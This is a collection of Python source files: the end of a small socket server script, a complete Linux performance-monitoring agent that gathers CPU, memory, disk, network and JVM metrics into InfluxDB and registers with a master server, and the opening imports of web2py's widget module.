conn.close() # close connection
arnold = 'CONNECTION ' + ip + ':' + port + " TERMINATED"
autolog(arnold)
start_handshake()
def fid_analyze(fid):
autolog(type(fid))
if fid == '99':
autolog(fid)
run = False
elif fid == '0':
# pipe to execute function
autolog('0_NETWORK_PROTOCOL')
elif fid == '1':
autolog('1_np')
elif fid == 'msg':
incoming_msg(fid)
else:
autolog('NO MATHCING FID EXECUTABLES')
def post_fid_anal():
pass
def incoming_msg(msg):
autolog(msg)
def start_handshake():
import socket
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# this is for easy starting/killing the app
soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
autolog('SOCKET CREATED')
try:
soc.bind((local_ip, n_port))
autolog('SOCKET BIND COMPLETE')
except socket.error as msg:
import sys
print(dt.datetime.now(), 'BIND_FAIL_ERROR: ' + str(sys.exc_info()))
sys.exit()
#Start listening on socket
soc.listen(10)
autolog('SOCKET LISTENING')
# for handling task in separate jobs we need threading
from threading import Thread
# this will make an infinite loop needed for
# not reseting server for every client
conn, addr = soc.accept()
ip, port = str(addr[0]), str(addr[1])
d = 'loop_0 > ACCEPTING CONNECTIONS FROM ' + ip + ':' + port
autolog(d)
try:
Thread(target=client_thread, args=(conn, ip, port)).start()
except:
print(dt.datetime.now(), "Terible error!")
import traceback
autolog('loop: ERROR')
traceback.print_exc()
soc.close()
def autolog(message):
import inspect, logging
# Get the previous frame in the stack, otherwise it would
# be this function!!!
func = inspect.currentframe().f_back.f_code
# Dump the message + the name of this function to the log.
logging.debug("{}\t{}\t{}\t{}".format(
dt.datetime.now(),
func.co_filename,
func.co_name,
message
))
|
performance_monitor.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: leeyoshinari
import os
import re
import time
import json
import queue
import traceback
import threading
from concurrent.futures import ThreadPoolExecutor
import requests
import influxdb
from logger import logger, cfg, handle_exception
class PerMon(object):
def __init__(self):
self.IP = cfg.getServer('host')
self.thread_pool = cfg.getServer('threadPool') if cfg.getServer('threadPool') >= 0 else 0
self._msg = {'port': [], 'pid': [], 'isRun': [], 'startTime': [], 'stopTime': []} # 端口号、进程号、监控状态、开始监控时间
self.is_system = cfg.getMonitor('isMonSystem') # 是否监控服务器的资源
self.error_times = cfg.getMonitor('errorTimes') # 执行命令失败次数
self.sleepTime = cfg.getMonitor('sleepTime')
self.maxCPU = cfg.getMonitor('maxCPU')
self.CPUDuration = cfg.getMonitor('CPUDuration') / cfg.getMonitor('system_interval')
self.isCPUAlert = cfg.getMonitor('isCPUAlert')
self.minMem = cfg.getMonitor('minMem')
self.isMemAlert = cfg.getMonitor('isMemAlert')
self.frequencyFGC = cfg.getMonitor('frequencyFGC')
self.isJvmAlert = cfg.getMonitor('isJvmAlert')
self.echo = cfg.getMonitor('echo')
self.isTCP = cfg.getMonitor('isTCP')
system_interval = cfg.getMonitor('system_interval') # 每次执行监控命令的时间间隔
port_interval = cfg.getMonitor('port_interval') # 每次执行监控命令的时间间隔
self.system_interval = max(system_interval, 1) # 设置的值如果小于1,则默认为1
self.port_interval = max(port_interval, 1)
self.system_interval = self.system_interval - 1.06 # 0.06为程序运行、写库时间
self.system_interval = max(self.system_interval, 0)
self.port_interval = self.port_interval - 0.195 # 0.195为程序运行、写库时间
self.system_version = '' # 系统版本
self.cpu_info = ''
self.cpu_cores = 0 # CPU核数
self.total_mem = 0 # 总内存,单位G
self.total_mem_100 = 0 # 总内存,单位100*G,主要用于求内存占比,减少运算量
self.nic = '' # 系统正在使用的网卡
self.all_disk = [] # 磁盘号
self.total_disk = 1 # 磁盘总大小,单位M
self.total_disk_h = 0 # 磁盘总大小,以人可读的方式展示,单位T或G
self.network_speed = 1 # 服务器网卡带宽
self.get_system_version()
self.get_cpu_cores()
self.get_total_mem()
self.get_system_nic()
self.get_disks()
self.get_system_net_speed()
self.get_total_disk_size()
self.monitor_task = queue.Queue() # 创建一个FIFO队列
self.executor = ThreadPoolExecutor(self.thread_pool + 1) # 创建线程池, +1是需要监控系统
self.client = influxdb.InfluxDBClient(cfg.getInflux('host'), cfg.getInflux('port'), cfg.getInflux('username'),
cfg.getInflux('password'), cfg.getInflux('database')) # 创建数据库连接
self.FGC = {} # 每个端口的full gc次数
self.FGC_time = {} # 每个端口每次full gc的时间
self.last_cpu_io = [] # 最近一段时间的cpu的值,约100s
self.is_java = {} # 监控的端口是否是java服务,0 or 1
self.monitor()
@property
def start(self):
return self._msg
@start.setter
def start(self, value):
if value['port']:
if value['port'] in self._msg['port']: # 如果端口已经监控过,则更新相关数据
index = self._msg['port'].index(value['port'])
self._msg['pid'][index] = value['pid']
if self._msg['isRun'][index] == 0: # 如果已经停止监控,则更新监控状态和开始监控时间
self._msg['isRun'][index] = value['is_run']
self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S')
self._msg['stopTime'][index] = None
self.monitor_task.put((self.write_cpu_mem, index)) # 把监控的端口任务放入队列中
self.FGC[str(value['port'])] = 0 # 重置 FGC次数
self.FGC_time[str(value['port'])] = [] # 重置 FGC 时间
if self.monitor_task.qsize() > 0: # 如果队列不为空,则监控状态置为2,排队中
self._msg['isRun'][index] = 2
else:
self._msg['isRun'][index] = value['is_run']
self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S')
self._msg['stopTime'][index] = None
else:
self.is_java_server(value['port']) # 判断端口是否是java服务
self._msg['pid'].append(value['pid']) # 如果端口未监控过,则添加该端口相关数据
self._msg['port'].append(value['port'])
self._msg['isRun'].append(value['is_run'])
self._msg['startTime'].append(time.strftime('%Y-%m-%d %H:%M:%S'))
self._msg['stopTime'].append(None)
self.monitor_task.put((self.write_cpu_mem, len(self._msg['port'])-1)) # 把监控的端口任务放入队列中
self.FGC.update({str(value['port']): 0}) # 初始化 FGC 次数
self.FGC_time.update({str(value['port']): []}) # 初始化 FGC 时间
if self.monitor_task.qsize() > 0: # 如果队列不为空,则监控状态置为2,排队中
self._msg['isRun'][-1] = 2
else:
raise Exception('参数异常')
# if len(self._msg['port']) > 0: # 如果已经开始监控端口,则同时开始监控整个系统
# self.is_system = 1
@property
def stop(self):
return self._msg
@stop.setter
def stop(self, value):
index = self._msg['port'].index(value['port'])
self._msg['isRun'][index] = value['is_run']
def worker(self):
"""
从队列中获取数据,并开始监控
:return:
"""
while True:
func, param = self.monitor_task.get()
func(param)
self.monitor_task.task_done()
def monitor(self):
"""
开始监控
:return:
"""
for i in range(self.thread_pool + 1):
self.executor.submit(self.worker) # 启动线程池监控任务
# self.monitor_task.put((self.register_and_clear_port, 1)) # 将注册和清理任务放入队列中
self.monitor_task.put((self.write_system_cpu_mem_and_register_clear, 1)) # 将监控系统的任务放入队列中
def write_cpu_mem(self, index):
"""
监控端口的CPU使用率、占用内存大小和jvm变化(Java应用)
:param index: 监控端口的下标索引
:return:
"""
self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S') # 更新开始监控时间
jvm = 0.0 # java服务的JVM内存数据初始化,主要用于非java服务的端口
run_error = 0 # 初始化执行监控命令失败的次数
run_error_time = time.time() # 初始化执行监控命令失败的时间
port = self._msg['port'][index]
pid = self._msg['pid'][index]
is_run_jvm = self.is_java.get(str(port), 0)
line = [{'measurement': self.IP,
'tags': {'type': str(port)},
'fields': {
'cpu': 0.0,
'mem': 0.0,
'jvm': 0.0,
'tcp': 0,
'close_wait': 0,
'time_wait': 0
}}]
while True:
if self._msg['isRun'][index] > 0: # 开始监控
self._msg['isRun'][index] = 1 # 重置端口监控状态为监控中
try:
cpu, mem = self.get_cpu_mem(pid) # 获取CPU使用率和占用内存大小
if cpu is None: # 如果CPU使用率未获取到,说明监控命令执行异常
logger.warning(f'获取cpu数据异常,异常pid为{pid}')
if port: # 如果端口号存在
pid = port_to_pid(port) # 根据端口号查询进程号
if pid: # 如果进程号存在,则更新进程号
self._msg['pid'][index] = pid
self._msg['startTime'][index] = time.strftime('%Y-%m-%d %H:%M:%S')
# 如果连续30分钟执行监控命令都失败,则停止监控
if time.time() - run_error_time > 1800:
self._msg['isRun'][index] = 0
self._msg['stopTime'][index] = time.time()
logger.error(f'{port}端口连续1800s执行监控命令都失败,已停止监控')
break
time.sleep(self.sleepTime)
continue
else: # 如果没有端口号,说明监控的直接是进程号
# 如果连续执行监控命令失败的次数大于设置值,则停止监控
if run_error > self.error_times:
self._msg['isRun'][index] = 0
self._msg['stopTime'][index] = time.time()
logger.error(f'{pid}进程连续{run_error}次执行监控命令失败,已停止监控')
break
run_error += 1 # 执行命令失败次数加1
logger.error(f'当前{pid}进程执行监控命令失败次数为{run_error}.')
time.sleep(self.sleepTime)
continue
line[0]['fields']['cpu'] = cpu
line[0]['fields']['mem'] = mem
tcp_num = self.get_port_tcp(port)
line[0]['fields']['tcp'] = tcp_num.get('tcp', 0)
line[0]['fields']['close_wait'] = tcp_num.get('close_wait', 0)
line[0]['fields']['time_wait'] = tcp_num.get('time_wait', 0)
if is_run_jvm:
jvm = self.get_jvm(port, pid) # 获取JVM内存
line[0]['fields']['jvm'] = jvm
self.client.write_points(line) # 写数据到数据库
logger.info(f'cpu_and_mem: port_{port},pid_{pid},{cpu},{mem},{jvm}')
run_error_time = time.time() # 如果监控命令执行成功,则重置
run_error = 0 # 如果监控命令执行成功,则重置
except Exception:
logger.error(traceback.format_exc())
time.sleep(self.sleepTime)
time.sleep(self.port_interval)
if self._msg['isRun'][index] == 0: # 如果监控状态为0, 则停止监控
logger.info(f'{port}端口已经停止监控')
self.FGC[str(port)] = 0
self._msg['isRun'][index] = 0
self._msg['stopTime'][index] = time.time()
break
def write_system_cpu_mem_and_register_clear(self, is_system):
"""
监控系统CPU使用率、剩余内存和磁盘IO
定时任务,总共有两个,一个是向服务端注册本机,一个是清理已经停止监控的过期端口
:param is_system: 未使用
:return:
"""
cpu_flag = True # 控制CPU过高时是否邮件通知标志
mem_flag = True # 控制内存过低时是否邮件通知标志
echo = True # 控制是否清理缓存标志
line = [{'measurement': self.IP,
'tags': {'type': 'system'},
'fields': {
'cpu': 0.0,
'mem': 0.0,
'rec': 0.0,
'trans': 0.0,
'net': 0.0,
'tcp': 0,
'retrans': 0.0
}}]
for disk in self.all_disk:
# 系统磁盘号目前发现2种格式,分别是'sda'和'sda-1',因为influxdb查询时,无法识别'-',故replace。其他格式的待验证
disk_n = disk.replace('-', '')
line[0]['fields'].update({disk_n: 0.0})
line[0]['fields'].update({disk_n + '_r': 0.0})
line[0]['fields'].update({disk_n + '_w': 0.0})
disk_usage = self.get_used_disk_rate()
# 注册本机参数
url = f'http://{cfg.getMaster("host")}:{cfg.getMaster("port")}/Register'
header = {
"Accept": "application/json, text/plain, */*",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json; charset=UTF-8"}
post_data = {
'host': self.IP,
'port': cfg.getServer('port'),
'system': self.system_version,
'cpu': self.cpu_cores,
'cpu_usage': 0.0,
'nic': self.nic,
'network_speed': self.network_speed,
'mem': round(self.total_mem, 2),
'mem_usage': 0.0,
'disk_size': self.total_disk_h,
'disk_usage': disk_usage,
'disks': ','.join(self.all_disk)
}
clear_time = time.time()
start_time = time.time()
disk_start_time = time.time()
while True:
if time.time() - start_time > 5: # 每隔5秒注册本机
try:
res = requests.post(url=url, json=post_data, headers=header)
logger.info(f"客户端注册结果:{res.content.decode('unicode_escape')}")
start_time = time.time()
if time.time() - clear_time > 600: # 每隔10分钟清理一次过期的端口
logger.debug('正常清理停止监控的端口')
self.clear_port()
clear_time = time.time()
except Exception:
logger.error(traceback.format_exc())
if time.time() - disk_start_time > 300: # 每隔5分钟获取一次磁盘使用情况
disk_usage = self.get_used_disk_rate()
if disk_usage:
post_data['disk_usage'] = disk_usage # 磁盘使用率,不带%号
disk_start_time = time.time()
if self.is_system: # 开始监控
try:
res = self.get_system_cpu_io_speed() # 获取系统CPU、内存和磁盘IO、带宽
if res['disk'] and res['cpu'] is not None and res['mem'] is not None:
for k, v in res['disk'].items():
line[0]['fields'][k] = min(v, 100) # 写磁盘IO数据到数据库
for k, v in res['disk_r'].items():
line[0]['fields'][k] = v
for k, v in res['disk_w'].items():
line[0]['fields'][k] = v
line[0]['fields']['cpu'] = res['cpu']
line[0]['fields']['mem'] = res['mem']
line[0]['fields']['rec'] = res['rece']
line[0]['fields']['trans'] = res['trans']
line[0]['fields']['net'] = res['network']
line[0]['fields']['tcp'] = res['tcp']
line[0]['fields']['retrans'] = res['retrans']
self.client.write_points(line) # 写cpu和内存到数据库
logger.info(f"system: CpuAndMem,{res['cpu']},{res['mem']},{res['disk']},{res['disk_r']},{res['disk_w']},"
f"{res['rece']},{res['trans']},{res['network']}, {res['tcp']}, {res['retrans']}")
if len(self.last_cpu_io) > self.CPUDuration:
self.last_cpu_io.pop(0)
self.last_cpu_io.append(res['cpu'])
cpu_usage = sum(self.last_cpu_io) / len(self.last_cpu_io)
post_data['cpu_usage'] = cpu_usage # CPU使用率,带%号
post_data['mem_usage'] = 1 - res['mem'] / self.total_mem # 内存使用率,不带%号
if cpu_usage > self.maxCPU:
msg = f'当前CPU平均使用率大于{self.maxCPU},CPU使用率过高。'
logger.warning(msg)
if self.isCPUAlert and cpu_flag:
cpu_flag = False # 标志符置为False,防止连续不断的发送邮件
thread = threading.Thread(target=notification, args=(msg,)) # 开启线程发送邮件通知
thread.start()
if res['mem'] <= self.minMem:
msg = f"{self.IP} 当前系统剩余内存为{res['mem']}G,内存过低"
logger.warning(msg)
if self.isMemAlert and mem_flag:
mem_flag = False # 标志符置为False,防止连续不断的发送邮件
thread = threading.Thread(target=notification, args=(msg, )) # 开启线程发送邮件通知
thread.start()
if self.echo and echo:
echo = False # 标志符置为False,防止连续不断的清理缓存
thread = threading.Thread(target=self.clear_cache, args=()) # 开启线程清理缓存
thread.start()
else:
# 如果内存正常,标识符重置为True
cpu_flag = True
mem_flag = True
echo = True
time.sleep(self.system_interval)
except Exception:
logger.error(traceback.format_exc())
time.sleep(3)
else:
time.sleep(3)
@handle_exception(is_return=True, default_value=(None, None))
def get_cpu_mem(self, pid):
"""
获取进程的CPU使用率和内存使用大小
:param pid: 进程号
:return: CPU使用率(%)和内存占用大小(G)
"""
cpu = None
mem = None
# result = os.popen(f'top -n 1 -b -p {pid} |tr -s " "').readlines()
result = os.popen(f'top -n 1 -b |grep -P {pid} |tr -s " "').readlines() # 执行命令
res = [ress.strip().split(' ') for ress in result]
logger.debug(f'查询进程{pid}的CPU使用率和内存结果为:{res}')
for r in res:
if str(pid) == r[0]:
ind = r.index(str(pid))
cpu = float(r[ind + 8]) / self.cpu_cores # CPU使用率
mem = float(r[ind + 9]) * self.total_mem_100 # 内存占用大小
return (cpu, mem)
@handle_exception(is_return=True, default_value=0)
def get_jvm(self, port, pid):
"""
获取JVM内存
:param port: 端口号
:param pid: 进程号
:return: jvm内存大小(G)
"""
result = os.popen(f'jstat -gc {pid} |tr -s " "').readlines()[1] # 执行命令
res = result.strip().split(' ')
logger.debug(f'查询进程{pid}的JVM结果为:{res}')
mem = float(res[2]) + float(res[3]) + float(res[5]) + float(res[7]) # 计算jvm
# 已追加写的方式,将FGC次数和时间写到本地。当FGC频率过高时,发送邮件提醒
fgc = int(res[14])
if self.FGC[str(port)] < fgc: # 如果FGC次数增加
self.FGC[str(port)] = fgc
self.FGC_time[str(port)].append(time.time())
if len(self.FGC_time[str(port)]) > 2: # 计算FGC频率
frequency = self.FGC_time[str(port)][-1] - self.FGC_time[str(port)][-2]
if frequency < self.frequencyFGC: # 如果FGC频率大于设置值,则发送邮件提醒
msg = f'{self.IP}服务器上的{port}端口的Full GC频率为{frequency}.'
logger.warning(msg)
if self.isJvmAlert:
thread = threading.Thread(target=notification, args=(msg, ))
thread.start()
# 将FGC次数和时间写到日志
logger.warning(f"端口{port}第{self.FGC[str(port)]}次Full GC.")
elif self.FGC[str(port)] > fgc: # 如果FGC次数减小,说明可能重启,则重置
self.FGC[str(port)] = 0
if self.FGC[str(port)] == 0: # 如果FGC次数为0,则重置
self.FGC_time[str(port)] = []
return mem / 1024 / 1024
@handle_exception(is_return=True, default_value={'disk': {}, 'disk_r': {}, 'disk_w': {}, 'cpu': None, 'mem': None, 'rece': None, 'trans': None, 'network': None, 'tcp': None, 'retrans': None})
def get_system_cpu_io_speed(self):
"""
获取系统CPU使用率、剩余内存和磁盘IO、网速和网络使用率
网速的获取,必须得间隔一段时间;磁盘IO的获取也得间隔一段时间
执行磁盘IO命令一般间隔1秒,故在执行磁盘IO命令前后执行网速命令,此时正好间隔约1秒
:return: 磁盘IO,cpu使用率(%),剩余内存(G),网络上行和下行速率,单位 Mb/s
"""
disk = {}
disk_r = {}
disk_w = {}
cpu = None
bps1 = None
bps2 = None
rece = None
trans = None
network = None
if self.nic:
bps1 = os.popen(f'cat /proc/net/dev |grep {self.nic} |tr -s " "').readlines()
logger.debug(f'第一次获取网速的结果:{bps1}')
result = os.popen(f'iostat -x -m 1 2 |tr -s " "').readlines() # 执行命令
logger.debug(f'获取磁盘IO结果:{result}')
if self.nic:
bps2 = os.popen(f'cat /proc/net/dev |grep {self.nic} |tr -s " "').readlines()
logger.debug(f'第二次获取网速的结果:{bps2}')
result.pop(0)
disk_res = [l.strip() for l in result if len(l) > 5]
disk_res = disk_res[int(len(disk_res)/2)-1:]
for i in range(len(disk_res)):
if 'avg-cpu' in disk_res[i]:
cpu_res = disk_res[i+1].strip().split(' ') # CPU空闲率
if len(cpu_res) > 3:
cpu = 100 - float(cpu_res[-1]) # CPU使用率
logger.debug(f'系统CPU使用率为:{cpu}%')
continue
if 'Device' in disk_res[i]:
for j in range(i+1, len(disk_res)): # 遍历所有磁盘
disk_line = disk_res[j].strip().split(' ')
disk_num = disk_line[0].replace('-', '') # replace的原因是因为influxdb查询时,无法识别'-'
disk.update({disk_num: float(disk_line[-1])}) # 磁盘的IO
disk_r.update({disk_num + '_r': float(disk_line[5])}) # 磁盘读 Mb/s
disk_w.update({disk_num + '_w': float(disk_line[6])}) # 磁盘写 Mb/s
logger.debug(f'当前获取的磁盘数据:IO: {disk}, Read: {disk_r}, Write: {disk_w}')
break
result = os.popen('cat /proc/meminfo| grep MemFree| uniq').readlines()[0] # 执行命令,获取系统剩余内存
logger.debug(f'系统剩余内存为:{result}G')
mem = float(result.split(':')[-1].split('k')[0].strip()) / 1024 / 1024
if bps1 and bps2:
data1 = bps1[0].split(':')[1].strip().split(' ')
data2 = bps2[0].split(':')[1].strip().split(' ')
rece = (int(data2[0]) - int(data1[0])) / 1024 / 1024
trans = (int(data2[8]) - int(data1[8])) / 1024 / 1024
# 如果没有获取到网口带宽数据,默认为1Mb/s;如果是千兆网口,可直接将结果除以1000
# 800 = 8 * 100,为什么要乘以8,因为网口带宽除以8即为网口支持的最大速率
network = 800 * (rece + trans) / self.network_speed
logger.debug(f'系统网络带宽:收{rece}Mb/s,发{trans}Mb/s,带宽占比{network}%')
tcp, Retrans_ratio = self.get_tcp()
return {'disk': disk, 'disk_r': disk_r, 'disk_w': disk_w, 'cpu': cpu, 'mem': mem, 'rece': rece,
'trans': trans, 'network': network, 'tcp': tcp, 'retrans': Retrans_ratio}
'''def get_handle(pid):
"""
获取进程占用的句柄数
:param pid: 进程号
:return: 句柄数
"""
result = os.popen("lsof -n | awk '{print $2}'| sort | uniq -c | sort -nr | " + "grep {}".format(pid)).readlines()
res = result[0].strip().split(' ')
logger.debug(res)
handles = None
if str(pid) in res:
handles = int(res[0])
return handles'''
@handle_exception(is_return=True, default_value=(0, 0.0))
def get_tcp(self):
"""
获取TCP数量,计算重传率
:return:
"""
tcp = 0
Retrans_ratio = 0.0
if self.isTCP:
result = os.popen('cat /proc/net/snmp |grep Tcp |tr -s " "').readlines()
tcps = result[-1].strip().split(' ')
logger.debug(f'获取TCP数据为{tcps}')
tcp = int(tcps[9]) # 当前服务器TCP连接数
Retrans_ratio = (int(tcps[-4]) / int(tcps[-5])) * 100 # TCP重传率
return tcp, Retrans_ratio
@handle_exception(is_return=True, default_value={})
def get_port_tcp(self, port):
"""
获取端口的连接数
:param port: 端口号
:return:
"""
tcp_num = {}
res = os.popen(f'netstat -ant |grep {port} |tr -s " "').read()
tcp_num.update({'tcp': res.count('tcp')})
tcp_num.update({'established': res.count('ESTABLISHED')})
tcp_num.update({'close_wait': res.count('CLOSE_WAIT')})
tcp_num.update({'time_wait': res.count('TIME_WAIT')})
return tcp_num
def get_cpu_cores(self):
"""
获取系统CPU信息
:return:
"""
cpu_model = ''
cpu_num = 0
cpu_core = 0
try:
result = os.popen('cat /proc/cpuinfo | grep "model name" |uniq').readlines()[0]
cpu_model = result.strip().split(':')[1].strip()
logger.info(f'当前系统CPU型号为{cpu_model}')
except Exception as err:
logger.error('CPU型号未获取到')
logger.error(err)
try:
result = os.popen('cat /proc/cpuinfo | grep "physical id" | uniq | wc -l').readlines()[0]
cpu_num = int(result)
logger.info(f'当前系统CPU个数为{cpu_num}')
except Exception as err:
logger.error('CPU型号未获取到')
logger.error(err)
try:
result = os.popen('cat /proc/cpuinfo | grep "cpu cores" | uniq').readlines()[0]
cpu_core = int(result.strip().split(':')[1].strip())
logger.info(f'当前系统每个CPU的核数为{cpu_core}')
except Exception as err:
logger.error('每个CPU的核数未获取到')
logger.error(err)
result = os.popen('cat /proc/cpuinfo| grep "processor"| wc -l').readlines()[0]
self.cpu_cores = int(result)
logger.info(f'当前系统CPU核数为{self.cpu_cores}')
if cpu_model and cpu_num and cpu_core:
self.cpu_info = f'{cpu_num}个{cpu_core}核CPU,共有{self.cpu_cores}核,CPU型号为{cpu_model}'
else:
self.cpu_info = f'CPU核数为{self.cpu_cores}'
@handle_exception(is_return=True)
def get_total_mem(self):
"""
获取系统总内存
:return:
"""
result = os.popen('cat /proc/meminfo| grep "MemTotal"| uniq').readlines()[0]
self.total_mem = float(result.split(':')[-1].split('k')[0].strip()) / 1024 / 1024
self.total_mem_100 = self.total_mem / 100
logger.info(f'当前系统总内存为{self.total_mem}G')
@handle_exception(is_return=True)
def get_disks(self):
"""
获取系统所有磁盘号
:return:
"""
result = os.popen(f'iostat -x -k |tr -s " "').readlines()
disk_res = [l.strip() for l in result if len(l) > 5]
for i in range(len(disk_res)):
if 'Device' in disk_res[i]:
for j in range(i + 1, len(disk_res)):
disk_line = disk_res[j].strip().split(' ')
self.all_disk.append(disk_line[0])
logger.info(f'当前系统共有{len(self.all_disk)}个磁盘,磁盘号分别为{"、".join(self.all_disk)}')
@handle_exception(is_return=True)
def get_system_nic(self):
"""
获取系统使用的网卡。
只能获取一个网卡,如果系统使用多个网卡,只能获取第一个,网卡排序使用 cat /proc/net/dev 查看
:return:
"""
network_card = []
result = os.popen('cat /proc/net/dev |tr -s " "').readlines() # 获取网卡
logger.debug(f'查询网卡时,第一次执行命令结果:{result}')
time.sleep(1)
result1 = os.popen('cat /proc/net/dev |tr -s " "').readlines() # 一秒后再次获取网卡
logger.debug(f'查询网卡时,第二次执行命令结果:{result1}')
for i in range(len(result)):
if ':' in result[i]:
title = result[i].strip().split(':')[0]
data = result[i].strip().split(':')[1]
title1 = result1[i].strip().split(':')[0]
data1 = result1[i].strip().split(':')[1]
if title == title1:
logger.debug(f'第一次数据有变化的网卡数据:{data}')
logger.debug(f'第二次数据有变化的网卡数据:{data1}')
rec = data.strip().split(' ')[0]
rec1 = data1.strip().split(' ')[0]
if rec != rec1: # 如果这个网卡数据有变化,则说明此卡在使用
network_card.append(title)
logger.debug(f'当前获得网卡数据:{network_card}')
if 'lo' in network_card: # 'lo'卡是本地127.0.0.1,需要去掉
network_card.pop(network_card.index('lo'))
if len(network_card) > 0: # 获取第一个卡
self.nic = network_card[0]
logger.info(f'当前服务器使用的网卡为{self.nic}')
else:
logger.error('当前服务器网卡未找到')
@handle_exception(is_return=True)
def get_total_disk_size(self):
"""
获取磁盘总大小
:return:
"""
result = os.popen('df -m |tr -s " "').readlines()
logger.debug(f'查询磁盘执行命令结果:{result}')
for line in result:
res = line.strip().split(' ')
if '/dev/' in res[0]:
size = float(res[1])
self.total_disk += size
logger.debug(f'当前磁盘大小为:{self.total_disk}M')
self.total_disk_h = self.total_disk / 1024
if self.total_disk_h > 1024:
total = round(self.total_disk_h / 1024, 2)
self.total_disk_h = f'{total}T'
else:
total = round(self.total_disk_h, 2)
self.total_disk_h = f'{total}G'
logger.info(f'当前服务器磁盘总大小为{self.total_disk_h}')
@handle_exception(is_return=True, default_value=0)
def get_used_disk_rate(self):
"""
获取磁盘使用的大小
:return:
"""
used_disk_size = 0
result = os.popen('df -m |tr -s " "').readlines()
logger.debug(f'查询磁盘执行命令结果:{result}')
for line in result:
res = line.strip().split(' ')
if '/dev/' in res[0]:
size = float(res[2])
used_disk_size += size
logger.info(f'当前磁盘已使用{used_disk_size}G')
return used_disk_size / self.total_disk
@handle_exception(is_return=True)
def get_system_net_speed(self):
"""
获取系统的带宽,单位是 Mbs
:return:
"""
if self.nic:
result = os.popen(f'ethtool {self.nic}').readlines()
logger.debug(f'查询网络带宽执行命令结果:{result}')
for line in result:
if 'Speed' in line:
logger.debug(f'当前网络带宽为:{line}')
res = re.findall("(\d+)", line)
speed = int(res[0])
if 'G' in line:
speed = speed * 1024
if 'K' in line:
speed = speed / 1024
self.network_speed = speed
break
logger.info(f'当前服务器网口带宽为{self.network_speed}Mb/s')
@handle_exception(is_return=True)
def get_system_version(self):
"""
获取系统发行版本或内核版本
:return:
"""
result = os.popen('cat /etc/redhat-release').readlines() # 获取系统发行版本
logger.debug(f'查询系统发行版本执行命令结果:{result}')
if result:
self.system_version = result[0].strip()
else:
result = os.popen('cat /proc/version').readlines()[0] # 获取系统内核版本
logger.debug(f'查询系统内核版本执行命令结果:{result}')
res = re.findall("gcc.*\((.*?)\).*GCC", result.strip())
self.system_version = res[0]
logger.info(f'当前系统发行/内核版本为{self.system_version}')
def is_java_server(self, port):
"""
判断端口是否是java服务
:param port: 端口号
"""
pid = port_to_pid(port)
try:
result = os.popen(f'jstat -gc {pid} |tr -s " "').readlines()[1] # 执行命令
res = result.strip().split(' ')
logger.debug(f'查询进程{pid}的JVM结果为:{res}')
_ = float(res[2]) + float(res[3]) + float(res[5]) + float(res[7]) # 计算jvm
self.is_java.update({str(port): 1})
except Exception as err:
logger.info(err)
self.is_java.update({str(port): 0})
@handle_exception(is_return=True)
def clear_port(self):
"""
清理系统存储的已经停止监控超过86400s的端口信息
:return:
"""
pop_list = []
for ind in range(len(self._msg['port'])):
if self._msg['isRun'][ind] == 0 and self._msg['stopTime'][ind]:
if time.time() - self._msg['stopTime'][ind] > 7200:
pop_list.append(ind)
logger.debug(f'清理过期停止监控端口:{pop_list}')
for ll in pop_list:
port = self._msg['port'].pop(ll)
self._msg['pid'].pop(ll)
self._msg['isRun'].pop(ll)
self._msg['startTime'].pop(ll)
self._msg['stopTime'].pop(ll)
del self.FGC[str(port)], self.FGC_time[str(port)]
logger.info(f'清理端口{port}成功')
def register_and_clear_port(self, flag=None):
"""
已弃用,该功能已放在 self.write_system_cpu_mem_and_register_clear 函数中执行
定时任务,总共有两个,一个是向服务端注册本机,一个是清理已经停止监控的过期端口
:param
:return:
"""
pass
'''url = f'http://{cfg.getMaster("host")}:{cfg.getMaster("port")}/Register'
header = {
"Accept": "application/json, text/plain, */*",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json; charset=UTF-8"}
post_data = {
'host': self.IP,
'port': cfg.getServer('port'),
'system': self.system_version,
'cpu': self.cpu_cores,
'nic': self.nic,
'network_speed': self.network_speed,
'mem': round(self.total_mem*100, 2),
'disk_size': self.total_disk,
'disks': ','.join(self.all_disk)
}
clear_time = time.time()
while True:
try:
res = requests.post(url=url, json=post_data, headers=header)
if time.time() - clear_time > 600:
self.clear_port()
clear_time = time.time()
except Exception as err:
logger.error(err)
time.sleep(5)'''
def clear_cache(self):
"""
清理缓存
:return:
"""
logger.info(f'开始清理缓存:echo {self.echo} >/proc/sys/vm/drop_caches')
os.popen(f'echo {self.echo} >/proc/sys/vm/drop_caches')
logger.info('清理缓存成功')
def __del__(self):
pass
@handle_exception(is_return=True)
def port_to_pid(port):
"""
根据端口号查询进程号
:param port: 端口号
:return: 进程号
"""
pid = None
result = os.popen(f'netstat -nlp|grep {port} |tr -s " "').readlines()
logger.debug(f'{port}端口的进程结果为:{result}')
flag = f':{port}'
res = [line.strip() for line in result if flag in line]
logger.debug(res[0])
p = res[0].split(' ')
pp = p[3].split(':')[-1]
if str(port) == pp:
pid = p[p.index('LISTEN') + 1].split('/')[0]
return pid
@handle_exception(is_return=True)
def notification(msg):
"""
发送邮件通知
:param msg: 邮件正文信息
:return:
"""
url = f'http://{cfg.getMaster("host")}:{cfg.getMaster("port")}/Notification'
header = {
"Accept": "application/json, text/plain, */*",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json; charset=UTF-8"}
post_data = {
'host': cfg.getServer('host'),
'msg': msg
}
logger.debug(f'发送邮件信息的内容:{msg}')
res = requests.post(url=url, json=post_data, headers=header)
if res.status_code == 200:
response = json.loads(res.content.decode())
if response['code'] == 0:
logger.info('邮件发送成功')
else:
logger.error(response['msg'])
else:
logger.error('邮件发送失败')
|
widget.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
| This file is part of the web2py Web Framework
| Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu>
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
The widget is called from web2py
----------------------------------
"""
import datetime
import sys
import cStringIO
import time
import thread
import threading
import os
import socket
import signal
import math
import logging
import newcron
import getpass
import gluon.main as main
from gluon.fileutils import read_file, write_file, create_welcome_w2p
from gluon.settings import global_settings
from gluon.shell import run, test
from gluon.utils import is_valid_ip_address, is_loopback_ip_address, getipaddrinfo
